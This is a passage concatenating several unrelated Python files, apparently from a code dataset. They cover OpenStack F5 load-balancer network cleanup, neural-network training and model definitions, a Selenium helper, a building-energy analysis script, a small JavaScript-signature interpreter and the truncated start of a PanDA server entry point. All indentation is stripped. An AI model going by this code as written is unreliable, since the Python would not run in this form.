if len(self.rds_cache[tenant_id][route_domain_id]) == 0:
deleted_rds.append(route_domain_id)
for rd in deleted_rds:
LOG.debug("removing route domain %d from tenant %s" %
(rd, tenant_id))
del self.rds_cache[tenant_id][rd]
def get_bigip_net_short_name(self, bigip, tenant_id, network_name):
# Return <network_type>-<seg_id> for bigip network
LOG.debug("get_bigip_net_short_name: %s:%s" % (
tenant_id, network_name))
partition_id = self.service_adapter.get_folder_name(tenant_id)
LOG.debug("network_name %s", network_name.split('/'))
network_name = network_name.split("/")[-1]
if 'tunnel-gre-' in network_name:
tunnel_key = self.network_helper.get_tunnel_key(
bigip,
network_name,
partition=partition_id
)
return 'gre-%s' % tunnel_key
elif 'tunnel-vxlan-' in network_name:
LOG.debug("Getting tunnel key for VXLAN: %s", network_name)
tunnel_key = self.network_helper.get_tunnel_key(
bigip,
network_name,
partition=partition_id
)
return 'vxlan-%s' % tunnel_key
else:
LOG.debug("Getting tunnel key for VLAN: %s", network_name)
vlan_id = self.network_helper.get_vlan_id(bigip,
name=network_name,
partition=partition_id)
return 'vlan-%s' % vlan_id
@staticmethod
def get_neutron_net_short_name(network):
# Return <network_type>-<seg_id> for neutron network
net_type = network.get('provider:network_type', None)
net_seg_key = network.get('provider:segmentation_id', None)
if not net_type or not net_seg_key:
raise f5_ex.InvalidNetworkType(
'Provider network attributes not complete:'
'provider: network_type - {0} '
'and provider:segmentation_id - {1}'
.format(net_type, net_seg_key))
return net_type + '-' + str(net_seg_key)
def _assure_subnet_snats(self, assure_bigips, service, subnetinfo):
# Ensure snat for subnet exists on bigips
tenant_id = service['loadbalancer']['tenant_id']
subnet = subnetinfo['subnet']
snats_per_subnet = self.conf.f5_snat_addresses_per_subnet
lb_id = service['loadbalancer']['id']
assure_bigips = \
[bigip for bigip in assure_bigips
if tenant_id not in bigip.assured_tenant_snat_subnets or
subnet['id'] not in
bigip.assured_tenant_snat_subnets[tenant_id]]
LOG.debug("_assure_subnet_snats: getting snat addrs for: %s" %
subnet['id'])
if len(assure_bigips):
snat_addrs = self.bigip_snat_manager.get_snat_addrs(
subnetinfo, tenant_id, snats_per_subnet, lb_id)
if len(snat_addrs) != snats_per_subnet:
raise f5_ex.SNATCreationException(
"Unable to satisfy request to allocate %d "
"snats. Actual SNAT count: %d SNATs" %
(snats_per_subnet, len(snat_addrs)))
for assure_bigip in assure_bigips:
self.bigip_snat_manager.assure_bigip_snats(
assure_bigip, subnetinfo, snat_addrs, tenant_id)
def _allocate_gw_addr(self, subnetinfo):
# Create a name for the port and for the IP Forwarding
# Virtual Server as well as the floating Self IP which
# will answer ARP for the members
need_port_for_gateway = False
network = subnetinfo['network']
subnet = subnetinfo['subnet']
if not network or not subnet:
LOG.error('Attempted to create default gateway'
' for network with no id...skipping.')
return
if not subnet['gateway_ip']:
raise KeyError("attempting to create gateway on subnet without "
"gateway ip address specified.")
gw_name = "gw-" + subnet['id']
ports = self.driver.plugin_rpc.get_port_by_name(port_name=gw_name)
if len(ports) < 1:
need_port_for_gateway = True
# There was no port on this agent's host, so get one from Neutron
if need_port_for_gateway:
try:
rpc = self.driver.plugin_rpc
new_port = rpc.create_port_on_subnet_with_specific_ip(
subnet_id=subnet['id'], mac_address=None,
name=gw_name, ip_address=subnet['gateway_ip'])
LOG.info('gateway IP for subnet %s will be port %s'
% (subnet['id'], new_port['id']))
except Exception as exc:
ermsg = 'Invalid default gateway for subnet %s:%s - %s.' \
% (subnet['id'],
subnet['gateway_ip'],
exc.message)
ermsg += " SNAT will not function and load balancing"
ermsg += " support will likely fail. Enable f5_snat_mode."
LOG.exception(ermsg)
return True
def post_service_networking(self, service, all_subnet_hints):
# Assure networks are deleted from big-ips
if self.conf.f5_global_routed_mode:
return
# L2toL3 networking layer
# Non Shared Config - Local Per BIG-IP
self.update_bigip_l2(service)
# Delete shared config objects
deleted_names = set()
for bigip in self.driver.get_config_bigips():
LOG.debug('post_service_networking: calling '
'_assure_delete_networks del nets sh for bigip %s %s'
% (bigip.device_name, all_subnet_hints))
subnet_hints = all_subnet_hints[bigip.device_name]
deleted_names = deleted_names.union(
self._assure_delete_nets_shared(bigip, service,
subnet_hints))
# Delete non shared config objects
for bigip in self.driver.get_all_bigips():
LOG.debug(' post_service_networking: calling '
' _assure_delete_networks del nets ns for bigip %s'
% bigip.device_name)
subnet_hints = all_subnet_hints[bigip.device_name]
deleted_names = deleted_names.union(
self._assure_delete_nets_nonshared(
bigip, service, subnet_hints)
)
for port_name in deleted_names:
LOG.debug(' post_service_networking: calling '
' del port %s'
% port_name)
self.driver.plugin_rpc.delete_port_by_name(
port_name=port_name)
def update_bigip_l2(self, service):
# Update fdb entries on bigip
loadbalancer = service['loadbalancer']
service_adapter = self.service_adapter
bigips = self.driver.get_all_bigips()
update_members = list()
delete_members = list()
update_loadbalancer = None
delete_loadbalancer = None
if "network_id" not in loadbalancer:
LOG.error("update_bigip_l2, expected network ID")
return
if loadbalancer.get('provisioning_status', None) == \
constants_v2.F5_PENDING_DELETE:
delete_loadbalancer = loadbalancer
else:
update_loadbalancer = loadbalancer
members = service.get('members', [])
for member in members:
member['network'] = service_adapter.get_network_from_service(
service, member['network_id'])
if member.get('provisioning_status', None) == \
constants_v2.F5_PENDING_DELETE:
delete_members.append(member)
else:
update_members.append(member)
loadbalancer['network'] = service_adapter.get_network_from_service(
service,
loadbalancer['network_id']
)
if delete_loadbalancer or delete_members:
self.l2_service.delete_fdb_entries(
bigips, delete_loadbalancer, delete_members)
if update_loadbalancer or update_members:
self.l2_service.add_fdb_entries(
bigips, update_loadbalancer, update_members)
LOG.debug("update_bigip_l2 complete")
def _assure_delete_nets_shared(self, bigip, service, subnet_hints):
# Assure shared configuration (which syncs) is deleted
deleted_names = set()
tenant_id = service['loadbalancer']['tenant_id']
delete_gateway = self.bigip_selfip_manager.delete_gateway_on_subnet
for subnetinfo in self._get_subnets_to_delete(bigip,
service,
subnet_hints):
try:
if not self.conf.f5_snat_mode:
gw_name = delete_gateway(bigip, subnetinfo)
deleted_names.add(gw_name)
my_deleted_names, my_in_use_subnets = \
self.bigip_snat_manager.delete_bigip_snats(
bigip, subnetinfo, tenant_id)
deleted_names = deleted_names.union(my_deleted_names)
for in_use_subnetid in my_in_use_subnets:
subnet_hints['check_for_delete_subnets'].pop(
in_use_subnetid, None)
except f5_ex.F5NeutronException as exc:
LOG.error("assure_delete_nets_shared: exception: %s"
% str(exc.msg))
except Exception as exc:
LOG.error("assure_delete_nets_shared: exception: %s"
% str(exc.message))
return deleted_names
def _assure_delete_nets_nonshared(self, bigip, service, subnet_hints):
# Delete non shared base objects for networks
deleted_names = set()
for subnetinfo in self._get_subnets_to_delete(bigip,
service,
subnet_hints):
try:
network = subnetinfo['network']
if self.l2_service.is_common_network(network):
network_folder = 'Common'
else:
network_folder = self.service_adapter.get_folder_name(
service['loadbalancer']['tenant_id'])
subnet = subnetinfo['subnet']
if self.conf.f5_populate_static_arp:
self.network_helper.arp_delete_by_subnet(
bigip,
subnet=subnet['cidr'],
mask=None,
partition=network_folder
)
local_selfip_name = "local-" + bigip.device_name + \
"-" + subnet['id']
selfip_address = self.bigip_selfip_manager.get_selfip_addr(
bigip,
local_selfip_name,
partition=network_folder
)
if not selfip_address:
LOG.error("Failed to get self IP address %s in cleanup.",
local_selfip_name)
self.bigip_selfip_manager.delete_selfip(
bigip,
local_selfip_name,
partition=network_folder
)
if self.l3_binding and selfip_address:
self.l3_binding.unbind_address(subnet_id=subnet['id'],
ip_address=selfip_address)
deleted_names.add(local_selfip_name)
if self.conf.f5_network_segment_physical_network:
opflex_net_id = network.get('id')
if opflex_net_id:
opflex_net_port = "bigip-opflex-{}".format(
opflex_net_id)
deleted_names.add(opflex_net_port)
self.l2_service.delete_bigip_network(bigip, network)
if subnet['id'] not in subnet_hints['do_not_delete_subnets']:
subnet_hints['do_not_delete_subnets'].append(subnet['id'])
self.remove_from_rds_cache(network, subnet)
tenant_id = service['loadbalancer']['tenant_id']
if tenant_id in bigip.assured_tenant_snat_subnets:
tenant_snat_subnets = \
bigip.assured_tenant_snat_subnets[tenant_id]
if subnet['id'] in tenant_snat_subnets:
tenant_snat_subnets.remove(subnet['id'])
except f5_ex.F5NeutronException as exc:
LOG.debug("assure_delete_nets_nonshared: exception: %s"
% str(exc.msg))
except Exception as exc:
LOG.debug("assure_delete_nets_nonshared: exception: %s"
% str(exc.message))
return deleted_names
def _get_subnets_to_delete(self, bigip, service, subnet_hints):
# Clean up any Self IP, SNATs, networks, and folder for
# services items that we deleted.
subnets_to_delete = []
for subnetinfo in subnet_hints['check_for_delete_subnets'].values():
subnet = self.service_adapter.get_subnet_from_service(
service, subnetinfo['subnet_id'])
subnetinfo['subnet'] = subnet
network = self.service_adapter.get_network_from_service(
service, subnetinfo['network_id'])
subnetinfo['network'] = network
route_domain = network.get('route_domain_id', None)
if not subnet:
continue
if not self._ips_exist_on_subnet(
bigip,
service,
subnet,
route_domain):
subnets_to_delete.append(subnetinfo)
return subnets_to_delete
def _ips_exist_on_subnet(self, bigip, service, subnet, route_domain):
# Does the big-ip have any IP addresses on this subnet?
LOG.debug("_ips_exist_on_subnet entry %s rd %s"
% (str(subnet['cidr']), route_domain))
route_domain = str(route_domain)
ipsubnet = netaddr.IPNetwork(subnet['cidr'])
# Are there any virtual addresses on this subnet?
folder = self.service_adapter.get_folder_name(
service['loadbalancer']['tenant_id']
)
virtual_services = self.network_helper.get_virtual_service_insertion(
bigip,
partition=folder
)
for virt_serv in virtual_services:
(_, dest) = virt_serv.items()[0]
LOG.debug(" _ips_exist_on_subnet: checking vip %s"
% str(dest['address']))
if len(dest['address'].split('%')) > 1:
vip_route_domain = dest['address'].split('%')[1]
else:
vip_route_domain = '0'
if vip_route_domain != route_domain:
continue
vip_addr = strip_domain_address(dest['address'])
if netaddr.IPAddress(vip_addr) in ipsubnet:
LOG.debug(" _ips_exist_on_subnet: found")
return True
# If there aren't any virtual addresses, are there
# node addresses on this subnet?
nodes = self.network_helper.get_node_addresses(
bigip,
partition=folder
)
for node in nodes:
LOG.debug(" _ips_exist_on_subnet: checking node %s"
% str(node))
if len(node.split('%')) > 1:
node_route_domain = node.split('%')[1]
else:
node_route_domain = '0'
if node_route_domain != route_domain:
continue
node_addr = strip_domain_address(node)
if netaddr.IPAddress(node_addr) in ipsubnet:
LOG.debug(" _ips_exist_on_subnet: found")
return True
LOG.debug(" _ips_exist_on_subnet exit %s"
% str(subnet['cidr']))
# nothing found
return False
def add_bigip_fdb(self, bigip, fdb):
self.l2_service.add_bigip_fdb(bigip, fdb)
def remove_bigip_fdb(self, bigip, fdb):
self.l2_service.remove_bigip_fdb(bigip, fdb)
def update_bigip_fdb(self, bigip, fdb):
self.l2_service.update_bigip_fdb(bigip, fdb)
def set_context(self, context):
self.l2_service.set_context(context)
def vlan_exists(self, bigip, network, folder='Common'):
return self.vlan_manager.exists(bigip, name=network, partition=folder)
def _get_subnets_to_assure(self, service):
# Examine service and return active networks
networks = dict()
loadbalancer = service['loadbalancer']
service_adapter = self.service_adapter
lb_status = loadbalancer['provisioning_status']
if lb_status != constants_v2.F5_PENDING_DELETE:
if 'network_id' in loadbalancer:
network = service_adapter.get_network_from_service(
service,
loadbalancer['network_id']
)
subnet = service_adapter.get_subnet_from_service(
service,
loadbalancer['vip_subnet_id']
)
networks[subnet['id']] = {'network': network,
'subnet': subnet,
'is_for_member': False}
for member in service.get('members', []):
if member['provisioning_status'] != constants_v2.F5_PENDING_DELETE:
if 'network_id' in member:
network = service_adapter.get_network_from_service(
service,
member['network_id']
)
subnet = service_adapter.get_subnet_from_service(
service,
member['subnet_id']
)
networks[subnet['id']] = {'network': network,
'subnet': subnet,
'is_for_member': True}
return networks.values()
|
python
|
import numpy as np
import torch
from net import Net
from generator import Generator
import utils
EPOCHS = 100000
BATCH_SIZE = 32
LR = 1e-3
LR_STEP = 0.1
LR_FAILS = 3
SIZE = (40, 40)
MARGIN = 1
NOISE = 0.1
MAX_LENGTH = 5
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
np.set_printoptions(threshold=np.inf, precision=4, suppress=True, linewidth=160)
gen = Generator(MAX_LENGTH, SIZE, MARGIN, NOISE)
net = Net(DEVICE)
print(net)
#---- train
def get_batch(size):
batch_x = []
batch_y = []
batch_lm = np.ones((size, MAX_LENGTH), dtype=np.float32) # loss mask
for i in range(size):
chars, img, ln = gen.generate()
chars = list(map(lambda x: ord(x), chars))
chars = np.array(chars)
batch_x.append(img)
batch_y.append(chars)
batch_lm[i, ln+1:] = 0
batch_x = np.array(batch_x, dtype=np.float32) / 255
batch_y = np.array(batch_y, dtype=np.int64) - ord('A')
return batch_x, batch_y, batch_lm
test_x, test_y, test_lm = get_batch(1024)
lr = LR
losses = []
best_loss = 1e6
lr_fails = 0
net.set_lr(lr)
print("LR: {:.2e}".format(lr))
fps = utils.Fps()
fps.start()
for e in range(EPOCHS):
train_x, train_y, train_lm = get_batch(BATCH_SIZE)
net.train(train_x, train_y, MAX_LENGTH, train_lm)
if utils.is_time(e, 100):
pred_y, msks = net(test_x, MAX_LENGTH)
pred_y = pred_y.argmax(dim=2).detach().cpu().numpy()
cond = np.logical_or( (pred_y == test_y), (1 - test_lm) )
corr = np.all(cond, 1).mean()
test_loss = net.get_loss(test_x, test_y, MAX_LENGTH, test_lm).item()
print("Epoch {}: loss {:.3f}, corr: {:.0f}%, fps: {:.1f}".format(e, test_loss, corr * 100, fps.fps(e)))
losses.append(test_loss)
if test_loss > best_loss:
lr_fails += 1
print("." * lr_fails)
if lr_fails >= LR_FAILS:
lr = lr * LR_STEP
net.set_lr(lr)
print("LR: {:.2e}".format(lr))
else:
best_loss = test_loss
lr_fails = 0
if utils.is_time(e, 1000):
torch.save(net.state_dict(), 'model')
|
python
|
# в разработке
class NavigationHelper:
def __init__(self, app):
self.app = app
def open_home_page(self):
wd = self.wd
# open home page
wd.get("http://localhost/adressbook/group.php")
def open_group_page(self):
wd = self.wd
# open group page
wd.find_element_by_link_text("groups").click()
|
python
|
"""ReBias
Copyright (c) 2020-present NAVER Corp.
MIT license
Implementation for simple statcked convolutional networks.
"""
import torch
import torch.nn as nn
class SimpleConvNet(nn.Module):
def __init__(self, num_classes=None, kernel_size=7, feature_pos='post'):
super(SimpleConvNet, self).__init__()
padding = kernel_size // 2
layers = [
nn.Conv2d(3, 16, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(16),
nn.ReLU(inplace=True),
nn.Conv2d(16, 32, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 64, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 128, kernel_size=kernel_size, padding=padding),
nn.BatchNorm2d(128),
nn.ReLU(inplace=True),
]
self.extracter = nn.Sequential(*layers)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(128, 10)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
if feature_pos not in ['pre', 'post', 'logits']:
raise ValueError(feature_pos)
self.feature_pos = feature_pos
def forward(self, x, logits_only=False):
pre_gap_feats = self.extracter(x)
post_gap_feats = self.avgpool(pre_gap_feats)
post_gap_feats = torch.flatten(post_gap_feats, 1)
logits = self.fc(post_gap_feats)
if logits_only:
return logits
elif self.feature_pos == 'pre':
feats = pre_gap_feats
elif self.feature_pos == 'post':
feats = post_gap_feats
else:
feats = logits
return logits, feats
|
python
|
import tensorflow as tf
import numpy as np
class Convolutional_NN(object):
def __init__(self):
pass
def lr_network(self, input_shape, label_shape):
"""
Create loss function and the list of metrics
Arguments:
input_shape: [list / tuple] input shape
label_shape: [list / tuple] output shape
"""
self.label_shape = label_shape
self.input_shape = input_shape
self.loss = tf.keras.losses.SparseCategoricalCrossentropy()
self.metrics = [tf.keras.metrics.SparseCategoricalAccuracy()]
def build_model(self):
'''
Return a CNN model
'''
model = tf.keras.models.Sequential()
model.add( tf.keras.Input(shape=self.input_shape))
if len(self.input_shape) == 1:
model.add(tf.keras.layers.Reshape((int(np.sqrt(self.input_shape[-1])), int(np.sqrt(self.input_shape[-1])),1), input_shape=(784,)))
model.add( tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu"))
model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(128))
model.add(tf.keras.layers.Dense(self.label_shape[-1], activation="softmax"))
return model
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 06 15:07:49 2016
@author: Mike
"""
from __future__ import division
import pandas as pd
import numpy as np
import matplotlib.lines as mlines
import matplotlib.pyplot as plt
from matplotlib.legend_handler import HandlerLine2D
import os
from geopy.distance import vincenty
from mpl_toolkits.basemap import Basemap
def findClosestStation(coords1, coords2):
'''
Function finds the closest value of coords2 to each value in coords1.
Inputs:
coords1 (iterable) - contains (lat, long) pairs
coords2 (iterable) - contains (lat, long) pairs
Outputs:
closest (list) - contains tuple of (index, distance_miles) of closest point
in coords2 to each tuple in coords1.
'''
closest = []
# for each pair of coordinates in coords1
for firLoc in coords1:
dis = []
# calculate the distance to each coordinate pair in coords2
for secLoc in coords2:
# append the distance in miles
dis.append(vincenty(firLoc,secLoc).miles)
# find the minimum distance and the index
# Uses base python, but numpy.argmin is applicable
# Check documentation on built-in functions for min and enumerate
min_index, min_distance = min(enumerate(dis), key = lambda p: p[1])
# store results
closest.append((min_index, min_distance))
return closest
def main():
# locate the meta data
fname = 'all_sites.csv'
metaDataPath = os.path.join(os.pardir, os.pardir, 'csv-only',
'meta', fname)
# locate tmy3 meta dat
fname = 'TMY3_StationsMeta.csv'
tmy3DataPath = os.path.join(os.pardir, os.pardir,'csv-only',
'meta', fname)
# Read the data into a pandas dataframe
tmy3MetaData = pd.DataFrame.from_csv(tmy3DataPath, index_col=None)
metaData = pd.DataFrame.from_csv(metaDataPath, index_col=None)
# get location data
lat = metaData[u'LAT'].values
lng = metaData[u'LNG'].values
# Find closest TMY3 weather data to each building
tmy3_lat = tmy3MetaData['Latitude'].values
tmy3_lng = tmy3MetaData['Longitude'].values
min_distance = findClosestStation(list(zip(lat,lng)),
list(zip(tmy3_lat,tmy3_lng)))
# store unique attributes of each minimum distance station
tmy3SiteNames = [tmy3MetaData['Site Name'][x[0]] for x in min_distance]
#---------------------------------------------------------------------------
# Find the biggest cluster of buildings
#---------------------------------------------------------------------------
'''
There is a weather station that has the most buildings for which it is the
closest weather station. Determine this station and plot the energy use
of these buildings.
'''
# list of all the indexes
index_list = [x[0] for x in min_distance]
# get the mode of the indexes (i.e., the most frequent)
most_freq = max(set(index_list), key = index_list.count)
# get the indices of the buildings that match the most frequent weather station
keepers = []
for index, tup in enumerate(min_distance):
if tup[0] == most_freq:
keepers.append(index)
# subset the pandas dataframe to pick the relevant buildings and get their data
keeperData = []
for index in keepers:
# get the site id
siteId = metaData[u'SITE_ID'][index]
# create path to data
buiFullPath = os.path.join(os.pardir, os.pardir, 'csv-only', 'csv', '{}.csv'.format(siteId))
# read energy data
energy_kWh = np.genfromtxt(buiFullPath, delimiter=',',skip_header=1,
usecols=2)
# annual energy use in kBTU
energyAnn_kBTU = np.sum(energy_kWh*3.412)
# get meta data
flrArea = metaData[u'SQ_FT'][index]
industry = metaData[u'INDUSTRY'][index]
# full building info
buiInfo = (siteId, energyAnn_kBTU, flrArea, industry, buiFullPath)
# save and append the data
keeperData.append(buiInfo)
#---------------------------------------------------------------------------
# Final plotting of the data
#---------------------------------------------------------------------------
'''
Create a scatter plot with square footage on x axis, energy use on y axis
and colored by industry type.
'''
# create a color for each of the unique industries
indNames = set([x[3] for x in keeperData])
numIndustries = len(indNames)
# get a color from a color map
cm = plt.get_cmap('Set1')
colPts = np.linspace(0.0, 0.5, numIndustries)
# relational database
type_color_map = dict(zip(indNames, colPts))
# get the data
colors = [type_color_map[x[3]] for x in keeperData]
sqFt = [x[2] for x in keeperData]
eneUse = [x[1]/1000 for x in keeperData]
areas = [np.interp(kk, [min(eneUse), np.percentile(eneUse, 25),
np.percentile(eneUse, 75),
max(eneUse)],
np.array([5, 10, 20, 40])*10) for kk in eneUse]
# plot
plt.scatter(sqFt, eneUse, c=colors, s = areas, edgecolor='')
plt.xlabel('Square Feet')
plt.ylabel('Annual Energy Use [MBTU]')
# Ensure the required directory exists
if not os.path.isdir('../../figures'):
os.mkdir('../../figures')
# Save figure
plt.savefig('../../figures/buildingsdata-session3.png')
if __name__ == '__main__':
main()
|
python
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
a.b -= 2
a[0] += 1
a[0:2] += 1
|
python
|
import re
class JSVM(object):
_memory = {}
_program = []
_js_methods = {}
def __init__(self, code=""):
# TODO: parse automatically the 'swap' method
# function Bn(a,b){var c=a[0];a[0]=a[b%a.length];a[b]=c;return a};
def _swap(args):
a = list(args[0])
b = int(args[1])
c = a[0]
a[0] = a[b % len(a)]
a[b] = c
return "".join(a)
def _split(args):
return ""
def _slice(args):
return args[0][int(args[1]):]
def _reverse(args):
return args[0][::-1]
def _join(args):
return "".join(args[0])
def _assign(args):
return args[0]
def _get(args):
return self._memory[args[0]]
self._js_methods = {
"split": _split,
"slice": _slice,
"reverse": _reverse,
"join": _join,
"$swap": _swap,
"$assign": _assign,
"$get": _get
}
if code != "":
self.compile(code)
def compile(self, code):
self._program = []
regex = re.compile(r"(\w+\.)?(\w+)\(([^)]*)\)")
code = code.replace("return ", "return=")
for instruction in code.split(";"):
#print instruction
var, method = instruction.split("=")
m = regex.match(method)
if m is None:
arguments = [method[1:-1]]
method = "$assign"
else:
m = m.groups()
#print m
arguments = []
pre_args = [m[0][:-1]] if m[0] is not None else []
pre_args += m[2].split(",")
for a in pre_args:
if a is None or a == "":
continue
# Replace variables with his value
arguments += [JSMethod(self._js_methods["$get"], a) if not a[0] == '"' and not a[0] == '' and not a.isdigit() else a]
# Suppose that an undefined method is '$swap' method
method = "$swap" if m[1] not in self._js_methods.keys() else m[1]
self._program += [(var, JSMethod(self._js_methods[method], arguments))]
return self._program
def setPreinterpreted(self, program):
self._program = program
def run(self):
for ins in self._program:
#print "%s(%s)" % (ins[1]._m.__name__, ins[1]._a)
if ins[0] not in self._memory:
self._memory[ins[0]] = None
self._memory[ins[0]] = ins[1].run()
return self._memory
class JSMethod(object):
def __init__(self, method, args):
self._m = method
self._a = args
def run(self):
args = [a.run() if isinstance(a, JSMethod) else a for a in self._a]
return self._m(args)
def __repr__(self):
return "%s(%s)" % (self._m.__name__, self._a)
|
python
|
#!/usr/bin/python
"""
entry point
"""
import datetime
import traceback
import six
import tempfile
import io
import signal
import json
import gzip
# config file
from pandaserver.config import panda_config
from pandaserver.taskbuffer.Initializer import initializer
from pandaserver.taskbuffer.TaskBuffer import taskBuffer
from pandaserver.jobdispatcher.JobDispatcher import jobDispatcher
from pandaserver.dataservice.DataService import dataService
from pandaserver.userinterface.UserIF import userIF
from pandaserver.taskbuffer.Utils import isAlive, putFile, deleteFile, getServer, updateLog, fetchLog,\
touchFile, getVomsAttr, putEventPickingRequest, getAttr, uploadLog, put_checkpoint, delete_checkpoint,\
put_file_recovery_request, put_workflow_request
from pandaserver.dataservice.DataService import datasetCompleted, updateFileStatusInDisp
from pandaserver.jobdispatcher.JobDispatcher import getJob, updateJob, getStatus, genPilotToken,\
getEventRanges, updateEventRange, getKeyPair, updateEventRanges, getDNsForS3, getProxy, getCommands, ackCommands,\
checkJobStatus, checkEventsAvailability, updateJobsInBulk, getResourceTypes
from pandaserver.userinterface.UserIF import submitJobs, getJobStatus, queryPandaIDs, killJobs, reassignJobs,\
getJobStatistics, getJobStatisticsPerSite, resubmitJobs, queryLastFilesInDataset, getPandaIDsSite,\
getJobsToBeUpdated, updateProdDBUpdateTimes, runTaskAssignment, getAssigningTask, getSiteSpecs,\
getCloudSpecs, seeCloudTask, queryJobInfoPerCloud, registerProxyKey, getProxyKey,\
getJobIDsInTimeRange, getPandIDsWithJobID, getFullJobStatus, getJobStatisticsForBamboo,\
getNUserJobs, addSiteAccess, listSiteAccess, getFilesInUseForAnal, updateSiteAccess,\
getPandaClientVer, getSlimmedFileInfoPandaIDs, getQueuedAnalJobs, getHighestPrioJobStat,\
getActiveDatasets, setCloudTaskByUser, getSerialNumberForGroupJob, getCachePrefixes,\
checkMergeGenerationStatus, getNumPilots, retryFailedJobsInActive,\
getJobStatisticsWithLabel, getPandaIDwithJobExeID, getJobStatisticsPerUserSite,\
getDisInUseForAnal, getLFNsInUseForAnal, getScriptOfflineRunning, setDebugMode,\
insertSandboxFileInfo, checkSandboxFile, changeJobPriorities, insertTaskParams,\
killTask, finishTask, getCmtConfigList, getJediTasksInTimeRange, getJediTaskDetails,\
retryTask, getRetryHistory, changeTaskPriority, reassignTask, changeTaskAttributePanda,\
pauseTask, resumeTask, increaseAttemptNrPanda, killUnfinishedJobs, changeTaskSplitRulePanda,\
changeTaskModTimePanda, avalancheTask, getPandaIDsWithTaskID, reactivateTask, getTaskStatus, \
reassignShare, listTasksInShare, getTaskParamsMap, updateWorkers, harvesterIsAlive,\
reportWorkerStats, reportWorkerStats_jobtype, addHarvesterDialogs, getJobStatisticsPerSiteResource, setNumSlotsForWP,\
reloadInput, enableJumboJobs, updateServiceMetrics, getUserJobMetadata, getJumboJobDatasets, getGShareStatus,\
sweepPQ,get_job_statistics_per_site_label_resource, relay_idds_command, send_command_to_job,\
execute_idds_workflow_command
# import error
import pandaserver.taskbuffer.ErrorCode
# initialize cx_Oracle using dummy connection
initializer.init()
# initialzie TaskBuffer
taskBuffer.init(panda_config.dbhost, panda_config.dbpasswd, panda_config.nDBConnection, True)
# initialize JobDispatcher
if panda_config.nDBConnection != 0:
jobDispatcher.init(taskBuffer)
# initialize DataService
if panda_config.nDBConnection != 0:
dataService.init(taskBuffer)
# initialize UserIF
if panda_config.nDBConnection != 0:
userIF.init(taskBuffer)
# import web I/F
allowedMethods = []
allowedMethods += ['isAlive', 'putFile', 'deleteFile', 'getServer', 'updateLog', 'fetchLog',
'touchFile', 'getVomsAttr', 'putEventPickingRequest', 'getAttr',
'uploadLog', 'put_checkpoint', 'delete_checkpoint', 'put_file_recovery_request',
'put_workflow_request']
allowedMethods += ['datasetCompleted', 'updateFileStatusInDisp']
allowedMethods += ['getJob', 'updateJob', 'getStatus', 'genPilotToken',
'getEventRanges', 'updateEventRange', 'getKeyPair',
'updateEventRanges', 'getDNsForS3', 'getProxy', 'getCommands', 'ackCommands',
'checkJobStatus', 'checkEventsAvailability', 'updateJobsInBulk', 'getResourceTypes']
allowedMethods += ['submitJobs', 'getJobStatus', 'queryPandaIDs', 'killJobs', 'reassignJobs', 'getJobStatistics',
'getJobStatisticsPerSite', 'resubmitJobs', 'queryLastFilesInDataset', 'getPandaIDsSite',
'getJobsToBeUpdated', 'updateProdDBUpdateTimes', 'runTaskAssignment', 'getAssigningTask',
'getSiteSpecs', 'getCloudSpecs', 'seeCloudTask', 'queryJobInfoPerCloud', 'registerProxyKey',
'getProxyKey', 'getJobIDsInTimeRange', 'getPandIDsWithJobID', 'getFullJobStatus',
'getJobStatisticsForBamboo', 'getNUserJobs', 'addSiteAccess', 'listSiteAccess',
'getFilesInUseForAnal', 'updateSiteAccess', 'getPandaClientVer', 'getSlimmedFileInfoPandaIDs',
'getQueuedAnalJobs', 'getHighestPrioJobStat', 'getActiveDatasets', 'setCloudTaskByUser',
'getSerialNumberForGroupJob', 'getCachePrefixes', 'checkMergeGenerationStatus', 'getNumPilots',
'retryFailedJobsInActive', 'getJobStatisticsWithLabel', 'getPandaIDwithJobExeID',
'getJobStatisticsPerUserSite', 'getDisInUseForAnal', 'getLFNsInUseForAnal', 'getScriptOfflineRunning',
'setDebugMode', 'insertSandboxFileInfo', 'checkSandboxFile', 'changeJobPriorities',
'insertTaskParams', 'killTask', 'finishTask', 'getCmtConfigList', 'getJediTasksInTimeRange',
'getJediTaskDetails', 'retryTask', 'getRetryHistory', 'changeTaskPriority', 'reassignTask',
'changeTaskAttributePanda', 'pauseTask', 'resumeTask', 'increaseAttemptNrPanda',
'killUnfinishedJobs', 'changeTaskSplitRulePanda', 'changeTaskModTimePanda', 'avalancheTask',
'getPandaIDsWithTaskID', 'reactivateTask', 'getTaskStatus',
'reassignShare', 'listTasksInShare', 'getTaskParamsMap', 'updateWorkers', 'harvesterIsAlive',
'reportWorkerStats', 'reportWorkerStats_jobtype', 'addHarvesterDialogs',
'getJobStatisticsPerSiteResource', 'setNumSlotsForWP', 'reloadInput', 'enableJumboJobs',
'updateServiceMetrics', 'getUserJobMetadata', 'getJumboJobDatasets',
'getGShareStatus', 'sweepPQ', 'get_job_statistics_per_site_label_resource', 'relay_idds_command',
'send_command_to_job','execute_idds_workflow_command']
# FastCGI/WSGI entry
if panda_config.useFastCGI or panda_config.useWSGI:
import os
import cgi
from pandacommon.pandalogger.PandaLogger import PandaLogger
from pandacommon.pandalogger.LogWrapper import LogWrapper
if panda_config.token_authType is None:
pass
elif panda_config.token_authType == 'scitokens':
import scitokens
else:
from pandaserver.srvcore import oidc_utils
# logger
_logger = PandaLogger().getLogger('Entry')
# dummy request object
class DummyReq:
def __init__(self, env, tmpLog):
# environ
self.subprocess_env = env
# header
self.headers_in = {}
# authentication
self.authenticated = True
# message
self.message = None
# content-length
if 'CONTENT_LENGTH' in self.subprocess_env:
self.headers_in["content-length"] = self.subprocess_env['CONTENT_LENGTH']
# scitoken
try:
